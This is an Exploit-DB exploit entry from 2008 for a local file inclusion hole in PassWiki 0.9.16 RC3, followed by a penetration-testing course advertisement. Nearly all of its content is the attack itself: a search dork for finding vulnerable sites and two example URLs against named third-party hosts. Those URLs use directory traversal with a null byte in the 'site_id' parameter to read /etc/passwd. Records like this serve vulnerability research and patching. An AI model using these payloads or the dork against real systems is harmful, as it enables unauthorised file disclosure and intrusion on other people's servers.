PassWiki 0.9.16 RC3 - 'site_id' Local File Inclusion

EDB-ID:

5704


Author:

mozi

Type:

webapps


Platform:

PHP

Date:

2008-05-31


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

dork: "powered by PassWiki"
example:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00


author:mozi2weed@yahoo.com
http://rstzone.org

# milw0rm.com [2008-05-31]